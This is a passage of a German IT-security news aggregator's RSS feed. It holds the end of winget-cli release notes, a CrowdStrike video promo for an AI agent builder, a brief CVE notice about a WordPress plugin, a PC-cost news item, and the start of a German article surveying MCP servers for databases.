<li>Normalize directory separators when adding packages to path by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3504149438" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5796" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5796/hovercard" href="https://github.com/microsoft/winget-cli/pull/5796">#5796</a></li>
<li>Add sleep to another inproc test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3740622150" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5935" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5935/hovercard" href="https://github.com/microsoft/winget-cli/pull/5935">#5935</a></li>
<li>Don't build inproc testbed for fuzzing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3745058247" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5937" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5937/hovercard" href="https://github.com/microsoft/winget-cli/pull/5937">#5937</a></li>
<li>Create schema 1.12.0 folder by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3757864843" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5944" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5944/hovercard" href="https://github.com/microsoft/winget-cli/pull/5944">#5944</a></li>
<li>Fix names of 1.12 Schemas by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3757909234" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5945" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5945/hovercard" href="https://github.com/microsoft/winget-cli/pull/5945">#5945</a></li>
<li>Fix Font feature property name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3758021326" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5946" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5946/hovercard" href="https://github.com/microsoft/winget-cli/pull/5946">#5946</a></li>
<li>Add check to ensure vcpkg triplets match across projects by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3771462095" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5950" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5950/hovercard" href="https://github.com/microsoft/winget-cli/pull/5950">#5950</a></li>
<li>Update release notes for v1.28 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3786109953" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5957" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5957/hovercard" href="https://github.com/microsoft/winget-cli/pull/5957">#5957</a></li>
<li>Details output option for <code>list</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3748529639" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5939" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5939/hovercard" href="https://github.com/microsoft/winget-cli/pull/5939">#5939</a></li>
<li>PowerShell Repair enhancements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3395519393" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5711" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5711/hovercard" href="https://github.com/microsoft/winget-cli/pull/5711">#5711</a></li>
<li>Allow inproc callers to disable termination signal handlers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3789855368" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5958" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5958/hovercard" href="https://github.com/microsoft/winget-cli/pull/5958">#5958</a></li>
<li>Add manifest version to WinGetUtilInterop by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/msftrubengu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/msftrubengu">@msftrubengu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3794767294" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5964" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5964/hovercard" href="https://github.com/microsoft/winget-cli/pull/5964">#5964</a></li>
<li>Fixes for updating winget from winget by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3806959508" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5972" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5972/hovercard" href="https://github.com/microsoft/winget-cli/pull/5972">#5972</a></li>
<li>Diagnostics and fix for pipeline test failures by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3810295053" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5975" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5975/hovercard" href="https://github.com/microsoft/winget-cli/pull/5975">#5975</a></li>
<li>Escape caller in user agent header by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3840346247" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5998" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5998/hovercard" href="https://github.com/microsoft/winget-cli/pull/5998">#5998</a></li>
<li>Add DSC resource list to manifest by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3839410468" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5997" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5997/hovercard" href="https://github.com/microsoft/winget-cli/pull/5997">#5997</a></li>
<li>Add command builder with escaped user input by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3817973099" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5982" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5982/hovercard" href="https://github.com/microsoft/winget-cli/pull/5982">#5982</a></li>
<li>Add missing closing brace in settings.export.schema.0.1.json by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DuckDuckStudio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DuckDuckStudio">@DuckDuckStudio</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3853198617" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6004" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6004/hovercard" href="https://github.com/microsoft/winget-cli/pull/6004">#6004</a></li>
<li>Turn off PWSH UT build in Fuzzing and ReleaseStatic for all platforms by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3857311162" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6005" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6005/hovercard" href="https://github.com/microsoft/winget-cli/pull/6005">#6005</a></li>
<li>Remove experimental feature gate on source edit by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3857921476" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6006" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6006/hovercard" href="https://github.com/microsoft/winget-cli/pull/6006">#6006</a></li>
<li>Update ReleaseNotes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3862674095" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6007" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6007/hovercard" href="https://github.com/microsoft/winget-cli/pull/6007">#6007</a></li>
<li>Make list details stable (1.28) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3889711357" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6021" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6021/hovercard" href="https://github.com/microsoft/winget-cli/pull/6021">#6021</a></li>
<li>Move to IReference rather than custom enum for optional bool (1.28) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3893659251" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6024" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6024/hovercard" href="https://github.com/microsoft/winget-cli/pull/6024">#6024</a></li>
<li>Apply latest localization patch (1.28) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3893720482" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6025" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6025/hovercard" href="https://github.com/microsoft/winget-cli/pull/6025">#6025</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mohiuddin-khan-shiam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mohiuddin-khan-shiam">@mohiuddin-khan-shiam</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3186146724" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5564" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5564/hovercard" href="https://github.com/microsoft/winget-cli/pull/5564">#5564</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/doterik/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/doterik">@doterik</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3725749076" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5924" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5924/hovercard" href="https://github.com/microsoft/winget-cli/pull/5924">#5924</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/microsoft/winget-cli/compare/v1.11.400...v1.28.240"><tt>v1.11.400...v1.28.240</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Charlotte AI AgentWorks: Build Your Security Workforce Demo]]></title>
<description><![CDATA[Author: CrowdStrike - Bewertung: 0x - Views:5 Today’s adversaries move at the speed of AI, so defenders need to reason, decide, and act faster across every stage of security operations.

Meet Charlotte AI AgentWorks, a no-code agent builder that enables teams to create mission-ready AI agents dir...]]></description>
<link>https://tsecurity.de/de/3600427/it-security-video/charlotte-ai-agentworks-build-your-security-workforce-demo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600427/it-security-video/charlotte-ai-agentworks-build-your-security-workforce-demo/</guid>
<pubDate>Tue, 16 Jun 2026 02:16:13 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: CrowdStrike - Bewertung: 0x - Views:5 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/tk95k9MM8cQ?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Today’s adversaries move at the speed of AI, so defenders need to reason, decide, and act faster across every stage of security operations.<br />
<br />
Meet Charlotte AI AgentWorks, a no-code agent builder that enables teams to create mission-ready AI agents directly inside the CrowdStrike Falcon® platform.<br />
<br />
In this video, you’ll see how Charlotte AI AgentWorks helps security teams:<br />
🔹 Define an agent’s mission using natural language and guided instructions<br />
🔹 Refine agent behavior with clarifying questions, knowledge files, model selection, authorized tools, and testing<br />
🔹 Build a SOC Risk Reduction Agent to review detections, cases, remediation activity, coverage gaps, and data ingestion health<br />
🔹 Create a Security Automation & Detection Engineering Agent to identify coverage gaps and generate review-ready detection packages<br />
🔹 Develop a Proactive Security & Compliance Readiness Agent to assess exposures, remediation status, policy alignment, and compliance gaps<br />
🔹 Summarize risk, readiness, and threat intelligence into executive-ready outputs and email updates<br />
<br />
From SOC risk review to detection engineering and compliance readiness, Charlotte AI AgentWorks turns repeatable workflows into structured, agent-driven action. Teams can define the mission, request the right output, validate results, and move from insight to action inside the Falcon platform.<br />
<br />
Every agent built in AgentWorks is secure by design, with built-in guardrails for role-based access, auditability, and human-in-the-loop controls.<br />
<br />
Ready to build your AI security workforce?<br />
<br />
Watch now to see Charlotte AI AgentWorks in action.<br />
<br />
CrowdStrike® Charlotte AI™:<br />
► Explore how Charlotte AI delivers intelligent automation and agentic workflows across the Falcon platform: https://utm.io/uqBKx<br />
<br />
📣 Connect With Us:<br />
► LinkedIn:<br />
https://www.linkedin.com/company/crowdstrike<br />
► X:<br />
https://twitter.com/CrowdStrike<br />
► Facebook:<br />
https://www.facebook.com/crowdstrike<br />
► Instagram:<br />
https://www.instagram.com/crowdstrike<br />
<br />
🔔 Subscribe and stay updated!<br />
<br />
Subscribe for more insights on AI-powered security, agentic workflows, and the latest innovations from CrowdStrike.<br />
<br />
Thanks for watching! If this sparked your interest, share it with your team and let us know what you would build with Charlotte AI AgentWorks.<br />
<br />
#CrowdStrike #CharlotteAI #AgentWorks #AgenticSOC #Cybersecurity #WeStopBreaches<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-2470 | Softaculous Page Builder Plugin up to 2.0.9 on WordPress authorization]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in Softaculous Page Builder Plugin up to 2.0.9 on WordPress. Impacted is an unknown function. Executing a manipulation can lead to incorrect authorization.

This vulnerability is registered as CVE-2026-2470. It is possible to launch the attack re...]]></description>
<link>https://tsecurity.de/de/3600192/sicherheitsluecken/cve-2026-2470-softaculous-page-builder-plugin-up-to-209-on-wordpress-authorization/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600192/sicherheitsluecken/cve-2026-2470-softaculous-page-builder-plugin-up-to-209-on-wordpress-authorization/</guid>
<pubDate>Mon, 15 Jun 2026 22:49:53 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/softaculous:page_builder_plugin">Softaculous Page Builder Plugin up to 2.0.9</a> on WordPress. Impacted is an unknown function. Executing a manipulation can lead to incorrect authorization.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-2470">CVE-2026-2470</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[I've Been DIYing PCs for 10 years. It's No Longer Cheaper to Build Your Own PC]]></title>
<description><![CDATA[In a major shift caused by AI-induced memory and storage shortages, building your own PC is now more expensive than buying from an OEM or boutique builder.]]></description>
<link>https://tsecurity.de/de/3598931/it-nachrichten/ive-been-diying-pcs-for-10-years-its-no-longer-cheaper-to-build-your-own-pc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598931/it-nachrichten/ive-been-diying-pcs-for-10-years-its-no-longer-cheaper-to-build-your-own-pc/</guid>
<pubDate>Mon, 15 Jun 2026 13:33:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In a major shift caused by AI-induced memory and storage shortages, building your own PC is now more expensive than buying from an OEM or boutique builder.]]></content:encoded>
</item>
<item>
<title><![CDATA[MCP-Server für Datenbanken]]></title>
<description><![CDATA[Datenbanken in KI-Workflows einzubinden, ist kein Problem – den richtigen MCP-Server vorausgesetzt.DC Studio | shutterstock.com



Das Model Context Protocol (MCP) hat sich zur Standard-Schnittstelle zwischen LLM-gestützten Tools und lokalen Systemen, internen und externen APIs sowie Datenquellen...]]></description>
<link>https://tsecurity.de/de/3597947/it-security-nachrichten/mcp-server-fuer-datenbanken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597947/it-security-nachrichten/mcp-server-fuer-datenbanken/</guid>
<pubDate>Mon, 15 Jun 2026 06:07:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/DC-Studio_shutterstock_2628162685_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="AI Dev 16z9" class="wp-image-4183528" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Datenbanken in KI-Workflows einzubinden, ist kein Problem – den richtigen MCP-Server vorausgesetzt.</figcaption></figure><p class="imageCredit">DC Studio | shutterstock.com</p></div>



<p>Das Model Context Protocol (<a href="https://www.computerwoche.de/article/4031227/was-ist-model-context-protocol.html" target="_blank">MCP</a>) hat sich zur Standard-Schnittstelle zwischen LLM-gestützten Tools und lokalen Systemen, internen und externen APIs sowie Datenquellen entwickelt. Offizielle MCP-Server stehen inzwischen nicht nur für <a href="https://www.computerwoche.de/article/4133146/5-mcp-server-fur-mehr-cloud-automation.html" target="_blank">große Cloud-Plattformen</a> und <a href="https://www.computerwoche.de/article/4103988/10-mcp-server-fur-devops.html" target="_blank">DevOps-Tools</a> zur Verfügung, sondern werden auch von den meisten wichtigen Datenbankplattformen unterstützt.</p>



<p>Einen MCP-Server für Datenbanken zu nutzen, kann Anwender unter anderem dazu befähigen,</p>



<ul class="wp-block-list">
<li>Abfragen durchzuführen, Daten zu erstellen und zu aktualisieren sowie administrative Tasks zu erledigen, ohne manuell SQL schreiben zu müssen.</li>



<li>mit LLMs neuen Code zu schreiben oder Automatisierungen zu erstellen, die auf das jeweilige Datenbankschema abgestimmt sind.</li>



<li>das Debugging über schnellere Abfragen optimieren, um Datenprobleme oder Fehlkonfigurationen aufzudecken.</li>
</ul>



<p>In diesem Beitrag stellen wir ihnen offizielle MCP-Server von führenden Datenbank-Plattformanbietern vor. Diese Server können von jedem MCP-kompatiblen Tool, jeder IDE und jedem Agenten genutzt werden. Das erfordert oft nur einen kleinen JSON-Eintrag in der MCP-Konfigurationsdatei.</p>



<h2 class="wp-block-heading">Amazon Aurora MCP-Server</h2>



<p><a href="https://www.computerwoche.de/article/4144155/mysql-weiter-unter-oracle-fuchtel.html" target="_blank">MySQL</a> und <a href="https://www.computerwoche.de/article/3508938/so-geht-postgresql.html" target="_blank">PostgreSQL</a> sind die weltweit am häufigsten verwendeten Open-Source-Datenbanken. In beiden Fällen existiert jedoch kein einheitlicher MCP-Server. Dafür gibt es diese bei verschiedenen Anbietern. Einer davon ist Amazon Web Services (AWS).</p>



<p>Das Unternehmen bietet für seinen gemanagten relationalen Datenbank-Service Aurora einen offiziellen MCP-Server an. Dieser ist sowohl mit MySQL als auch mit PostgreSQL kompatibel. Laut der <a href="https://github.com/awslabs/mcp/tree/main/src/mysql-mcp-server" target="_blank" rel="noreferrer noopener">Dokumentation auf GitHub</a> kann der <a href="https://awslabs.github.io/mcp/servers/mysql-mcp-server" target="_blank" rel="noreferrer noopener">Amazon Aurora MySQL MCP-Server</a> dazu genutzt werden, natürlichsprachliche Befehle in MySQL-kompatible SQL-Abfragen umzuwandeln. Diese können anschließend auf Aurora-MySQL-Datenbanken ausgeführt werden. In ähnlicher Weise bietet der <a href="https://github.com/awslabs/mcp/tree/main/src/postgres-mcp-server" target="_blank" rel="noreferrer noopener">Aurora Postgres MCP-Server</a> MCP-Tools, um mit PostgreSQL-Datenbanken zu arbeiten. Für verteilte Postgres-Datenbanken übernimmt der <a href="https://github.com/awslabs/mcp/tree/main/src/aurora-dsql-mcp-server" target="_blank" rel="noreferrer noopener">Aurora DSQL MCP-Server</a> dieselbe Funktion.</p>



<p>AWS hat darüber hinaus ein <a href="https://github.com/awslabs/mcp" target="_blank" rel="noreferrer noopener">wachsendes Portfolio mit offiziellen MCP-Servern</a> für seine gesamte Produktpalette aufgebaut – darunter auch andere Amazon-Datenbankplattformen wie:</p>



<ul class="wp-block-list">
<li><a href="https://awslabs.github.io/mcp/servers/dynamodb-mcp-server" target="_blank" rel="noreferrer noopener">DynamoDB</a>,</li>



<li><a href="https://awslabs.github.io/mcp/servers/elasticache-mcp-server" target="_blank" rel="noreferrer noopener">ElastiCache</a> und</li>



<li><a href="https://awslabs.github.io/mcp/servers/redshift-mcp-server" target="_blank" rel="noreferrer noopener">Redshift</a>.</li>
</ul>



<p><strong>Zu empfehlen für:</strong> AWS-agnostische Anwender, die ihre LLM-Interaktionen mit Daten unterfüttern wollen.</p>



<h2 class="wp-block-heading">BigQuery MCP-Server</h2>



<p>BigQuery ist Googles Cloud-basierte Datenanalyseplattform und eine beliebte Datenquelle für KI-Anwendungen. BigQuery-Nutzer mit konfiguriertem API-Zugriff können den <a href="https://docs.cloud.google.com/bigquery/docs/use-bigquery-mcp" target="_blank" rel="noreferrer noopener">BigQuery MCP Server</a> nutzen, um über MCP-kompatible KI-Clients mit der Plattform zu interagieren. Mithilfe dieses Remote-MCP-Servers können Entwickler:</p>



<ul class="wp-block-list">
<li>Abfragen zu Datenquellen generieren und ausführen oder</li>



<li>Metadaten zu Datensätzen, Tabellen und Schemata abrufen.</li>
</ul>



<p>All das ist mit einem einfachen Prompt in natürlicher Sprache realisierbar, beispielsweise: „Liste alle Datensätze im Projekt <code>PROJECT_ID</code> auf.“ Die Ergebnisse lassen sich nach Region, Datensatz-ID, Spaltennamen und weiteren Kriterien filtern. Als Teil von Googles vollständig gemanagtem, remote gehostetem MCP-Portfolio kann der BigQuery MCP Server verteilten Teams das Leben in Bezug auf Security, Wartung und Benutzerfreundlichkeit leichter machen. Allerdings unterliegen die BigQuery-MCP-Tools einigen Beschränkungen hinsichtlich des Umfangs der Abfrageergebnisse, der Verarbeitungszeit und anderen Faktoren.</p>



<p><strong>Zu empfehlen für:</strong> Anwender, die bereits auf BigQuery setzen und zusätzliche, agentische Kontrollmaßnahmen wünschen.</p>



<h2 class="wp-block-heading">Elastic Agent Builder</h2>



<p>Eine weitere wichtige Datenbankkategorie umfasst Plattformen, die für Keyword- und semantische Suchen konzipiert sind. In diesem Bereich wird häufig Elasticsearch eingesetzt. Anstelle eines einzelnen MCP-Servers bietetdas Unternehmen inzwischen den <a href="https://www.elastic.co/docs/explore-analyze/ai-features/elastic-agent-builder" target="_blank" rel="noreferrer noopener">Elastic Agent Builder</a> an. Dabei handelt es sich um ein umfassenderes Framework, das auf agentenbasierte Workflows ausgerichtet ist.</p>



<p>Mit dem Elastic Agent Builder können Anwender mit KI-Agenten chatten, um Kontext aus den Elasticsearch-Daten abzurufen und diesen auf verschiedene Umgebungen auszuweiten. Der Agent Builder selbst enthält einen <a href="https://www.elastic.co/docs/explore-analyze/ai-features/agent-builder/mcp-server" target="_blank" rel="noreferrer noopener">MCP-Server-Endpunkt</a> für die Programmability und um Agenten anderen Clients zugänglich zu machen. Hierbei handelt es sich ausdrücklich<strong> nicht</strong> um eine direkte MCP-Schnittstelle zu den reinen Elasticsearch-APIs. Stattdessen stellt das Interface Skills der Agentenplattform bereit.</p>



<p>Ein möglicher Nachteil ist dabei, dass dadurch eine zusätzliche Ebene zwischen IDE (beziehungsweise Agenten) und den Daten, nach denen gesucht wird, eingezogen wird. Einen Agenten einzurichten, erfordert eine höhere Abonnement-Stufe und im Vergleich zu anderen MCP-Servern sind zusätzliche Konfigurationsschritte erforderlich.</p>



<p><strong>Zu empfehlen für:</strong> Anwender, die Wert auf eine erweiterbare gemeinsame Ebene für die Interaktion sowohl mit Elasticsearch als auch mit externen MCP-Servern legen und gleichzeitig Verantwortlichkeiten wie Berechtigungen zentralisieren möchten.</p>



<h2 class="wp-block-heading">Neo4j MCP-Server</h2>



<p>Graph-Datenbanken sind inzwischen ebenfalls ein wichtiger NoSQL-Datenbanktyp. Dieser ist darauf spezialisiert, mithilfe von Nodes und Edges Abfragen in stark vernetzten Datenstrukturen zu beschleunigen. Eine populäre Option in diesem Bereich ist Neo4j. Der zugehörige <a href="https://neo4j.com/developer/genai-ecosystem/model-context-protocol-mcp/">offizielle MCP-Server</a> funktioniert mit jeder Art von Neo4j-Deployment (Desktop, Sandbox, selbstverwaltet und gemanagt) und ermöglicht es LLM-basierten Clients unter anderem:</p>



<ul class="wp-block-list">
<li>Graph-Schemata abzurufen,</li>



<li>Lese- und Schreibanweisungen auszuführen, oder</li>



<li>Graph-Algorithmen auszuführen.</li>
</ul>



<p>Darüber hinaus sind weitere Neo4j-MCP-Server für spezielle Anwendungsbereiche <a href="https://github.com/neo4j-contrib/mcp-neo4j" target="_blank" rel="noreferrer noopener">verfügbar</a>.</p>



<p><strong>Zu empfehlen für:</strong> Neo4j-Poweruser, die mit ihren Graph-Datenbanken auf chatbasierte Weise experimentieren möchten.</p>



<h2 class="wp-block-heading">MCP Toolbox for Databases</h2>



